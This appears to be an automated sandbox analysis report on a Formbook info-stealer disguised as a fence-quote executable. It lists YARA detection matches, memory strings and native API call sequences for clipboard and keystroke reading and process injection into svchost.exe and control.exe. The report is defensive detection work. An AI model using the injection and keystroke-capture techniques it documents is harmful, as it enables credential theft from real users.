Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000003.00000002.3812362279.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375368578.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000003.00000000.1375368578.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.pollensense.com/

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00DF425A

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DF4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00DF4458

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

0_2_00DF425A

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DE0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00DE0219

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00E0CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00E0CDAC

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.2024 Lusail Fence-WITH STICKER-2-003.exe.18d0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.3808376595.0000000000640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1418182361.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.3822306235.000000000EBD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.3808465152.0000000000670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1421599562.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1366051855.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.1417629112.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.3807906421.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 2024 Lusail Fence-WITH STICKER-2-003.exe PID: 7572, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 7624, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: control.exe PID: 7668, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00D83B4C
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe, 00000000.00000000.1355098104.0000000000E35000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f52dad5d-0
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe, 00000000.00000000.1355098104.0000000000E35000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_34ec23d0-b
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f114ab28-f
Source: 2024 Lusail Fence-WITH STICKER-2-003.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_3f426e60-7

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A350 NtCreateFile,	2_2_0041A350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A400 NtReadFile,	2_2_0041A400
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A480 NtClose,	2_2_0041A480
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A530 NtAllocateVirtualMemory,	2_2_0041A530
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A47F NtClose,	2_2_0041A47F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041A52A NtAllocateVirtualMemory,	2_2_0041A52A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672B60 NtClose,LdrInitializeThunk,	2_2_03672B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_03672BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672AD0 NtReadFile,LdrInitializeThunk,	2_2_03672AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672F30 NtCreateSection,LdrInitializeThunk,	2_2_03672F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672FE0 NtCreateFile,LdrInitializeThunk,	2_2_03672FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672FB0 NtResumeThread,LdrInitializeThunk,	2_2_03672FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672F90 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_03672F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_03672EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672E80 NtReadVirtualMemory,LdrInitializeThunk,	2_2_03672E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672D30 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_03672D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672D10 NtMapViewOfSection,LdrInitializeThunk,	2_2_03672D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03672DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672DD0 NtDelayExecution,LdrInitializeThunk,	2_2_03672DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672CA0 NtQueryInformationToken,LdrInitializeThunk,	2_2_03672CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03674340 NtSetContextThread,	2_2_03674340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03674650 NtSuspendThread,	2_2_03674650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672BE0 NtQueryValueKey,	2_2_03672BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672BA0 NtEnumerateValueKey,	2_2_03672BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672B80 NtQueryInformationFile,	2_2_03672B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672AF0 NtWriteFile,	2_2_03672AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672AB0 NtWaitForSingleObject,	2_2_03672AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672F60 NtCreateProcessEx,	2_2_03672F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672FA0 NtQuerySection,	2_2_03672FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672E30 NtWriteVirtualMemory,	2_2_03672E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672EE0 NtQueueApcThread,	2_2_03672EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672D00 NtSetInformationFile,	2_2_03672D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672DB0 NtEnumerateKey,	2_2_03672DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672C60 NtCreateKey,	2_2_03672C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672C70 NtFreeVirtualMemory,	2_2_03672C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672C00 NtQueryInformationProcess,	2_2_03672C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672CF0 NtOpenProcess,	2_2_03672CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672CC0 NtQueryVirtualMemory,	2_2_03672CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03673010 NtOpenDirectoryObject,	2_2_03673010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03673090 NtSetValueKey,	2_2_03673090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036735C0 NtCreateMutant,	2_2_036735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036739B0 NtGetContextThread,	2_2_036739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03673D70 NtOpenThread,	2_2_03673D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03673D10 NtOpenProcessToken,	2_2_03673D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose,	2_2_03B5A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5A042 NtQueryInformationProcess,	2_2_03B5A042
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBB8232 NtCreateFile,	3_2_0EBB8232
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBB9E12 NtProtectVirtualMemory,	3_2_0EBB9E12
Source: C:\Windows\explorer.exe	Code function: 3_2_0EBB9E0A NtProtectVirtualMemory,	3_2_0EBB9E0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2C60 NtCreateKey,LdrInitializeThunk,	4_2_044B2C60
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_044B2C70
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_044B2CA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_044B2D10
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_044B2DD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_044B2DF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_044B2EA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2F30 NtCreateSection,LdrInitializeThunk,	4_2_044B2F30
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2FE0 NtCreateFile,LdrInitializeThunk,	4_2_044B2FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2AD0 NtReadFile,LdrInitializeThunk,	4_2_044B2AD0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2B60 NtClose,LdrInitializeThunk,	4_2_044B2B60
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_044B2BE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_044B2BF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B35C0 NtCreateMutant,LdrInitializeThunk,	4_2_044B35C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B4650 NtSuspendThread,	4_2_044B4650
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B4340 NtSetContextThread,	4_2_044B4340
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2C00 NtQueryInformationProcess,	4_2_044B2C00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2CC0 NtQueryVirtualMemory,	4_2_044B2CC0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2CF0 NtOpenProcess,	4_2_044B2CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2D00 NtSetInformationFile,	4_2_044B2D00
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2D30 NtUnmapViewOfSection,	4_2_044B2D30
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2DB0 NtEnumerateKey,	4_2_044B2DB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2E30 NtWriteVirtualMemory,	4_2_044B2E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2EE0 NtQueueApcThread,	4_2_044B2EE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2E80 NtReadVirtualMemory,	4_2_044B2E80
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2F60 NtCreateProcessEx,	4_2_044B2F60
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2F90 NtProtectVirtualMemory,	4_2_044B2F90
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2FA0 NtQuerySection,	4_2_044B2FA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2FB0 NtResumeThread,	4_2_044B2FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2AF0 NtWriteFile,	4_2_044B2AF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2AB0 NtWaitForSingleObject,	4_2_044B2AB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2B80 NtQueryInformationFile,	4_2_044B2B80
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B2BA0 NtEnumerateValueKey,	4_2_044B2BA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B3010 NtOpenDirectoryObject,	4_2_044B3010
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B3090 NtSetValueKey,	4_2_044B3090
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B3D70 NtOpenThread,	4_2_044B3D70
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B3D10 NtOpenProcessToken,	4_2_044B3D10
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_044B39B0 NtGetContextThread,	4_2_044B39B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BA350 NtCreateFile,	4_2_001BA350
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BA400 NtReadFile,	4_2_001BA400
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BA480 NtClose,	4_2_001BA480
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BA530 NtAllocateVirtualMemory,	4_2_001BA530
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BA47F NtClose,	4_2_001BA47F
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_001BA52A NtAllocateVirtualMemory,	4_2_001BA52A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0417A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	4_2_0417A036
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04179BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	4_2_04179BAF
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_0417A042 NtQueryInformationProcess,	4_2_0417A042
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04179BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_04179BB2

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DE40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_00DE40B1

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DD8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00DD8858

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe

Code function: 0_2_00DE545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00DE545F

Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00D8E800	0_2_00D8E800
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DADBB5	0_2_00DADBB5
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00E0804A	0_2_00E0804A
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00D8E060	0_2_00D8E060
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00D94140	0_2_00D94140
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DA2405	0_2_00DA2405
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DB6522	0_2_00DB6522
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00E00665	0_2_00E00665
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DB267E	0_2_00DB267E
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00D96843	0_2_00D96843
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DA283A	0_2_00DA283A
Source: C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe	Code function: 0_2_00DB89DF	0_2_00DB89DF
